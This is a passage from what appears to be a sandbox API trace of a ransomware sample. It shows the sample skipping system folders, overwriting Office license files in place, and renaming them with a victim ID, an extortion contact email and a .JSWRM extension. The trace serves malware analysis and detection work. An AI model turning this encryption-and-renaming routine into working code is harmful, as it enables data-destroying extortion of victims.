Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.806] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.806] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.806] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.808] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.808] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.808] CloseHandle (hObject=0x45c) returned 1 [0104.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0104.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0104.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.810] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5fc05cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5fc05cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe60f1896, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest1-ppd.xrm-ms", cAlternateFileName="O3955A~1.XRM")) returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2=".") returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="..") returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="...") returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="windows") returned -1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.810] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.811] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23134) returned 1 [0104.811] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.811] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.814] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.814] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.814] CloseHandle (hObject=0x45c) returned 1 [0104.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0104.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0104.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0104.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0104.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0104.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.816] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5afba39, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5afba39, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5f9a39c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest1-ul-oob.xrm-ms", cAlternateFileName="O353AD~1.XRM")) returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.816] lstrcmpiW (lpString1="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.817] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0104.817] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.817] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.819] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.819] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.819] CloseHandle (hObject=0x45c) returned 1 [0104.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0104.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0104.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0104.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0104.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0104.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.821] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5bba5ac, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5bba5ac, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5c9f573, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest2-pl.xrm-ms", cAlternateFileName="O3B6B4~1.XRM")) returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2=".") returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="..") returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="...") returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="windows") returned -1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.821] lstrcmpiW (lpString1="O365HomePremR_SubTest2-pl.xrm-ms", lpString2="msocache") returned 1 [0104.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: 